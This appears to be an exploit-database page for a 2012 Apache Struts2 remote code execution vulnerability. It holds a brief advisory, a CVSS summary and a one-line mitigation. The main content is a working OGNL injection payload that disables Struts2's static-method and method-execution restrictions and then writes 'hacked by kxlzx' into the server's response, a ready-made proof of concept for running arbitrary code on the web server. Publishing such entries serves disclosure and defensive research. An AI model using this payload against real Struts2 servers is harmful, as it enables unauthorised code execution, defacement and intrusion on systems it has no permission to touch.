header-logo
Suggest Exploit
vendor:
Struts2
by:
kxlzx
9,8
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Struts2
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Apache Struts2 Remote Code Execution

Apache Struts2 is prone to a remote-code-execution vulnerability because it fails to sufficiently sanitize user-supplied input. Attackers can exploit this issue to execute arbitrary code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Sanitize user-supplied input.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55165/info

Apache Struts2 is prone to a remote-code-execution vulnerability because it fails to sufficiently sanitize user-supplied input.

Attackers can exploit this issue to execute arbitrary code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. 

%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}

Navigation

Suggest Exploit

Services By CQR